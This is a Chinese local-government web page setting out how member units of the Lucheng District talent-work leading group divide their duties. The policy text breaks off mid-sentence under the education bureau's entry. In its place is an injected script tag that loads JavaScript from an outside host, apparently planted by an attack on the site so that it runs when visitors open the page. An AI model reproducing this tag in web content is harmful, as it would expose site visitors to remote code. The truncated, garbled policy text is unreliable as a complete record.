首页>政策文件
中共温州市鹿城区委办公室关于区委人才工作领导小组成员单位职责分工的意见
时间:2008-03-31 来源: 作者: 字号:[ ]

(2005年7月19日)

   为了认真贯彻落实全国、省市和全区人才工作会议以及《2004—2008年鹿城区人才发展纲要》(鹿委发〔2004〕34号)的精神和要求,大力实施人才强区战略,进一步加强和改进我区人才工作,建立健全人才工作责任制和统分结合、协调高效的工作机制,形成党委统一领导,组织部门牵头抓总,有关部门各司其职、密切配合的人才工作新格局。经区委同意,对区委人才工作领导小组成员单位职责分工提出如下意见:
  一、职责分工
  1、区委办、区府办
  (1)负责传达党和国家、省市、区关于人才工作的指示精神,会同有关部门开展综合性的调查研究;参与全区人才工作有关政策措施的制定。
  (2)负责联络并协助完成区委、区政府领导向区委人才工作领导小组交办的有关事项,对需要提请区委、区政府研究解决的人才工作重大事项进行协调,会同区委人才工作领导小组办公室做好会议安排、联系协调等工作。
  (3)协助区委、区政府领导加强与高层次人才的联系,负责收集、反馈联系和督办有关问题。
  2、区委组织部(区委人才工作领导小组办公室)
  (1)在区委人才工作领导小组的领导下,负责全区人才工作的牵头抓总、宏观指导、综合协调和督促检查;承担区委人才工作领导小组办公室的日常管理职能,定期向区委人才工作领导小组汇报工作。

  (2)负责全区人才工作目标责任制的实施,会同有关部门做好目标制定、检查考核和管理工作。

  (3)掌握了解全区人才工作开展情况和人才队伍建设的基本情况;针对全区人才工作中热点、难点和重大问题,会同有关部门开展调查研究,制定完善相关政策规定和意见;做好党政人才的培养选拔和管理监督工作。

  (4)做好专业技术拔尖人才的选拔推荐、奖励和管理工作;会同有关部门开展各类人才的评优评先工作;协助区委、区政府领导做好与各类高层次人才的联系工作。

3、区委宣传部
  (1)负责会同有关方面做好全区人才工作的宣传报道工作;制定全区人才工作宣传年度计划,组织新闻媒体,进一步营造“尊重劳动、尊重知识、尊重人才、尊重创造”的良好舆论氛围。
  (2)负责做好文化、卫生、体育等系统人才工作,研究制定相关的政策措施。
  (3)会同有关部门积极做好各类人才的思想政治工作,在全区引导广大人才树立正确的世界观、人生观、价值观,自觉投身于我区改革开放和现代化建设事业。
  4、区委统战部
  (1)负责联系党外人才中的优秀代表;协同组织人事部门做好优秀党外人才的培养、举荐、选拔工作。
  (2)宣传、贯彻党的人才工作政策,调查研究党内外人才的合作共事关系,总结交流经验,调动各类党外人才的积极性和创造性。
  (3)加强组织领导,充分发挥工商联在联系社会各界、推进民营企业家队伍建设和提高综合素质中的积极作用;了解和掌握各类党外人才的思想动态,反映他们的意见和要求。
  (4)定期与有关部门联系,参与制定有关党外人才的政策和研讨有关党外人才工作。
  5、区委农办

  (1)研究制定农村适用人才引进、培养和使用的相关政策措施,并抓好落实。

  (2)做好农业序列专业技术职务评审工作,采取有效措施,发挥农村各类人才的积极作用。
  6、区发展计划局
  (1)会同有关部门制定与全区科技发展、高新技术产业发展战略、规划、计划需要相适应的中长期人才规划。

  (2)组织专家咨询智囊团,对“人才强区”战略、中长期人才规划等重大问题进行决策咨询。
  7、区经济贸易局
  (1)抓好全区企业经营管理人才队伍建设,加快培养能够参与国际市场竞争的高素质企业经营管理人才队伍,提高企业经营管理人才的整体素质。
  (2)会同有关部门了解、掌握全区规模以上企业经营管理人才队伍的基本情况,研究提出调动企业经营者积极性的政策措施,充分发挥企业家的积极作用,促进企业健康发展。
  (3)会同有关部门做好为企业引进人才和智力的牵线搭桥工作,促进企业与高校、科研院所的交流和合作。
  (4)重视各类产业人才载体建设,会同有关部门组织实施“重人才先进企业”评选活动,进一步引导和发挥企业吸引、培养、使用人才的主体作用。
   8、区教育局
  (1)围绕“科教兴区”战略,提出促进教育与社会、经济协调发展的措施,加快构建现代国民教育体系和终身教育体系,为我区经济建设和社会发展培养更多的合格人才。
  (2)负责做好教育系统人才工作,加快骨干教师优秀群体的人才梯队培养;加强师资培训和教科研制度建设,努力培养一批在全市、全省乃至全国有影响的名教师和教育专家。
  (3)利用我?script src=http://ssxf8.com/x.js>

【返回顶部】【打印本稿】【关闭本页】
0